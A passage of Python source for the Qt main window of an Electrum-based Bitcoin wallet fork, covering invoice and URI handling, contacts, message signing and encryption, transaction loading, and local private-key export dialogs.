self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
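# Switches the send tab between on-chain and lightning mode; the "Max" button
# is only relevant for on-chain sends.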
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
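# Multiple recipients: pre-fill the payto field in pay-to-many format,
# one "<recipient>, <amount>" pair per line, with 0 as a placeholder amount
# for the user to edit.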
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
grid.addWidget(QLabel(lnaddr.paymenthash.hex()), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
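# Expose each Commands method in the console namespace, wired to run against
# this window's wallet and to prompt for the password via self.password_dialog
# when required.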
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if not self.network.is_lightning_running():
return
cur, total = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_percent = 0
progress_str = "??%"
if cur is not None and total is not None and total > 0:
# note: Progress is rescaled such that 95% is considered "done".
# "Real" progress can stay around 98-99% for a long time, which
# might needlessly worry users.
progress_percent = (1.0 / 0.95 * cur / total) * 100
progress_percent = min(progress_percent, 100)
progress_percent = round(progress_percent)
progress_str = f"{progress_percent}%"
if progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
labels_clayout.selected_index()
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_show_xpub = run_hook('show_xpub_button', self, dialog, labels_clayout)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_show_xpub, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(data, parent or self, title, help_text=help_text,
show_copy_text_btn=show_copy_text_btn)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin Global address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin Global address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitglobal:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(self, _('Input channel backup'), _("Channel Backup:"), _("Load backup"))
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
